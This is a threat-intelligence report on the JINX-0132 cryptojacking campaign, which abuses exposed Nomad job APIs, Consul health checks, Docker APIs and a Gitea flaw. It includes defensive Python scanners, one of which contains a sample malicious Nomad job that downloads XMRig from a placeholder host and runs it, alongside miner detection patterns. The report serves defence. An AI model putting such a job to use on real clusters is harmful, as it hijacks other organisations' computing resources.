Introduction

Researchers have identified a threat group named JINX-0132 that is exploiting misconfigured HashiCorp Nomad deployments and other DevOps tools as attack vectors for cryptojacking [5]. This campaign is significant as it represents one of the first documented instances of Nomad misconfigurations being exploited in the wild.

Description

Researchers have identified a threat group named JINX-0132 that is exploiting misconfigured HashiCorp Nomad deployments, along with other DevOps tools such as Docker and Gitea, as attack vectors for cryptojacking [5]. The campaign is particularly notable because it marks one of the first documented instances of Nomad misconfigurations being exploited in the wild. JINX-0132 targets publicly accessible DevOps web servers [3], including exposed HashiCorp Nomad instances [3], and has been observed managing hundreds of clients; the CPU and memory resources of those instances could cost the affected organizations tens of thousands of dollars per month. Approximately 25% of cloud environments use these technologies [4] [5], 5% expose them directly to the internet [4] [5], and 30% of those exposed deployments are misconfigured [5], leaving attackers a substantial pool of exploitable targets.

JINX-0132 leverages Nomad’s job queue feature [5], which allows users to submit tasks to nodes registered with the Nomad server [5]. The default open configuration of Nomad’s job scheduling API permits any user with access to the Nomad server API to create and execute jobs, potentially leading to remote code execution (RCE) on the server and connected nodes [5]. Attackers exploit these exposed APIs to deploy multiple malicious jobs with seemingly random names within a consistent task group called “NIGNOG” on compromised hosts to download and execute the XMRig miner, which connects to a public Monero mining pool using an attacker-controlled wallet address [3]. This automation of attacks enables JINX-0132 to initiate mining operations with minimal effort once a misconfigured instance is identified [4].
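The job-submission abuse described above leaves traces in the job specifications a Nomad server holds. The following is an added example, not code from the original report or from HashiCorp: it walks job documents shaped like Nomad's HTTP API job representation (GET /v1/job/<id>, with "ID", "TaskGroups", "Tasks", "Driver", "Config" and "Artifacts") and flags the indicators the report names (the "NIGNOG" task group, XMRig / Monero pool strings, a host-exec driver fetching a remote binary, and, as a low-confidence signal, machine-looking job names). The sample jobs, hostnames and wallet value are constructed placeholders.

```python
"""Flag Nomad jobs that match the cryptojacking pattern described in the report.

Added example, not code from the original report or from HashiCorp. Assumes
job documents shaped like Nomad's HTTP API job representation; the sample
jobs below are constructed, with .invalid hostnames and a placeholder wallet.
"""
import re

# Task-group name reported for this campaign.
SUSPICIOUS_GROUPS = {"NIGNOG"}

# Strings that point at the XMRig miner or a Monero mining pool.
MINER_RE = re.compile(r"xmrig|monero|stratum\+tcp|donate-level", re.I)

# Task drivers that run commands directly on the Nomad client host.
HOST_EXEC_DRIVERS = {"raw_exec", "exec"}


def _task_strings(task):
    """Collect every string in a task's Config and Artifacts for matching."""
    out = []
    for value in (task.get("Config") or {}).values():
        if isinstance(value, str):
            out.append(value)
        elif isinstance(value, list):
            out.extend(x for x in value if isinstance(x, str))
    for art in task.get("Artifacts") or []:
        if art.get("GetterSource"):
            out.append(art["GetterSource"])
    return out


def looks_random(name):
    """Low-confidence heuristic: one alphanumeric token mixing letters and digits."""
    return (len(name) >= 8 and name.isalnum()
            and any(c.isdigit() for c in name) and any(c.isalpha() for c in name))


def scan_job(job):
    """Return a list of findings for one job document; an empty list means clean."""
    findings = []
    if looks_random(job.get("Name") or job.get("ID", "")):
        findings.append("job name looks machine-generated")
    for group in job.get("TaskGroups") or []:
        gname = group.get("Name", "")
        if gname in SUSPICIOUS_GROUPS:
            findings.append(f"task group '{gname}' matches campaign indicator")
        for task in group.get("Tasks") or []:
            blob = " ".join(_task_strings(task))
            if MINER_RE.search(blob):
                findings.append(f"task '{task.get('Name')}' references a miner or mining pool")
            remote = any(a.get("GetterSource", "").startswith("http")
                         for a in task.get("Artifacts") or [])
            if task.get("Driver") in HOST_EXEC_DRIVERS and remote:
                findings.append(f"task '{task.get('Name')}' runs a remotely fetched binary on the host")
    return findings


def scan_jobs(jobs):
    """Map job ID -> findings, keeping only jobs that raised at least one."""
    result = {}
    for job in jobs:
        hits = scan_job(job)
        if hits:
            result[job.get("ID", "?")] = hits
    return result


# Constructed sample: one ordinary service job and one job in the reported shape.
SAMPLE_JOBS = [
    {"ID": "web-frontend", "Name": "web-frontend",
     "TaskGroups": [{"Name": "web", "Tasks": [
         {"Name": "nginx", "Driver": "docker", "Config": {"image": "nginx:1.25"}}]}]},
    {"ID": "q7x2kd9a", "Name": "q7x2kd9a",
     "TaskGroups": [{"Name": "NIGNOG", "Tasks": [
         {"Name": "run", "Driver": "raw_exec",
          "Config": {"command": "/bin/sh",
                     "args": ["-c", "./xmrig -o pool.example.invalid:3333 -u WALLET_PLACEHOLDER"]},
          "Artifacts": [{"GetterSource": "http://dropper.example.invalid/xmrig.tar.gz"}]}]}]},
]

if __name__ == "__main__":
    for job_id, hits in scan_jobs(SAMPLE_JOBS).items():
        print(job_id)
        for h in hits:
            print("  -", h)
```

In practice the job documents would come from the Nomad API of a cluster you operate; the indicator list is deliberately small, so treat a hit as a prompt to inspect the job and the submitting identity rather than as proof on its own.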

Additionally, JINX-0132 is abusing the health check service in Consul to execute bash commands and run XMRig payloads [5]. Without access control lists (ACLs) or other security features enabled [5], any user with remote access can register services and health checks [5], which again amounts to RCE [5]. The group is also exploiting CVE-2020-14144 in older versions of Gitea and Docker Engine API endpoints that are exposed without authentication [5], allowing it to create containers that launch crypto-miner images [5]. Reports indicate that there are over 5,300 exposed Consul servers and more than 400 exposed Nomad servers worldwide, with significant concentrations in China, the United States, Germany, Singapore [2], Finland [2], the Netherlands, and the United Kingdom. Some compromised servers had significant compute power [1], which could incur substantial costs for the affected organizations.

To mitigate these risks [1] [3] [5], it is crucial to follow best practices when deploying Nomad [3], in particular enabling ACLs and job security features so that unauthenticated access to the Jobs feature is denied and malicious payloads cannot be scheduled [3]. Additionally, keeping Gitea instances updated [5], enabling Consul's security features such as ACLs [5], and not binding the Docker API to 0.0.0.0 or exposing it to the internet are recommended measures to protect against this kind of exploitation.
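The mitigations above, and the Consul and Docker exposures described earlier, all come down to a few agent settings. The following is an added example, not code from the original report, HashiCorp or Docker: it audits the three agent configurations in their JSON form (Nomad and Consul accept JSON configuration files; Docker reads daemon.json) for ACLs being disabled, Consul's default policy not being "deny", Consul script checks being enabled (which lets registered health checks run arbitrary commands), and the Docker API listening on a TCP socket bound to all interfaces or without TLS verification. Only documented keys are used (acl.enabled, acl.default_policy, enable_script_checks, enable_local_script_checks, hosts, tlsverify); the weak and hardened sample configs are constructed.

```python
"""Audit Nomad, Consul and Docker Engine configs for the exposures the report describes.

Added example, not code from the original report, HashiCorp or Docker. Assumes
the configs are available as JSON; the weak and hardened samples are constructed.
"""
import json


def audit_nomad(cfg):
    """Findings for a Nomad agent config; empty list means nothing flagged."""
    findings = []
    acl = cfg.get("acl") or {}
    if not acl.get("enabled", False):
        findings.append("nomad: ACLs disabled, anyone reaching the API can submit jobs")
    return findings


def audit_consul(cfg):
    """Findings for a Consul agent config."""
    findings = []
    acl = cfg.get("acl") or {}
    if not acl.get("enabled", False):
        findings.append("consul: ACLs disabled, anyone reaching the API can register services and checks")
    elif acl.get("default_policy", "allow") != "deny":
        findings.append("consul: ACL default_policy is not 'deny'")
    if cfg.get("enable_script_checks", False):
        findings.append("consul: enable_script_checks lets registered health checks run commands; "
                        "use enable_local_script_checks if script checks are needed")
    return findings


def _all_interfaces(addr):
    """True when a host:port string binds every interface (IPv4, IPv6 or unspecified)."""
    return addr.startswith("0.0.0.0") or addr.startswith("[::]") or addr.startswith(":")


def audit_docker(cfg):
    """Findings for a Docker daemon.json."""
    findings = []
    for host in cfg.get("hosts") or []:
        if not host.startswith("tcp://"):
            continue  # unix sockets are local by construction
        addr = host[len("tcp://"):]
        if _all_interfaces(addr):
            findings.append(f"docker: API bound to all interfaces ({host})")
        if not cfg.get("tlsverify", False):
            findings.append(f"docker: TCP listener {host} without tlsverify")
    return findings


def audit_all(nomad_json, consul_json, docker_json):
    """Run all three audits over JSON text and return the combined findings."""
    return (audit_nomad(json.loads(nomad_json))
            + audit_consul(json.loads(consul_json))
            + audit_docker(json.loads(docker_json)))


# Constructed weak configs matching the exposures in the report.
WEAK_NOMAD = '{"bind_addr": "0.0.0.0", "server": {"enabled": true}, "acl": {"enabled": false}}'
WEAK_CONSUL = '{"client_addr": "0.0.0.0", "enable_script_checks": true}'
WEAK_DOCKER = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed hardened counterparts.
HARDENED_NOMAD = '{"bind_addr": "0.0.0.0", "server": {"enabled": true}, "acl": {"enabled": true}}'
HARDENED_CONSUL = ('{"acl": {"enabled": true, "default_policy": "deny"}, '
                   '"enable_local_script_checks": true}')
HARDENED_DOCKER = '{"hosts": ["unix:///var/run/docker.sock"]}'

if __name__ == "__main__":
    for label, trio in (("weak", (WEAK_NOMAD, WEAK_CONSUL, WEAK_DOCKER)),
                        ("hardened", (HARDENED_NOMAD, HARDENED_CONSUL, HARDENED_DOCKER))):
        print(label)
        for f in audit_all(*trio) or ["no findings"]:
            print("  -", f)
```

Enabling ACLs on Nomad and Consul is only the first step; the bootstrap token and the policies you attach to it decide who can still submit jobs or register checks, and those deserve the same review as the flags checked here.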

Conclusion

The activities of JINX-0132 highlight the critical need for robust security measures in DevOps environments. The exploitation of misconfigured Nomad deployments and other tools underscores the potential financial and operational impacts on organizations. Implementing best practices [3], such as enabling ACLs, updating software, and securing APIs, is essential to mitigate these risks [1]. As the landscape of cyber threats evolves, continuous vigilance and proactive security measures will be vital in safeguarding against such sophisticated attacks.

References

[1] https://securityonline.info/jinx-0132-cryptojackers-exploit-misconfigured-devops-environments/
[2] https://siberulak.com/cryptokacking-kampanyasi-githubdan-hazir-araclari-kullanarak-devops-apileri-kullaniyor/
[3] https://www.wiz.io/blog/jinx-0132-cryptojacking-campaign
[4] https://undercodenews.com/hackers-exploit-misconfigured-hashicorp-nomad-in-first-ever-attack-campaign/
[5] https://www.infosecurity-magazine.com/news/cryptojacking-campaign-devops/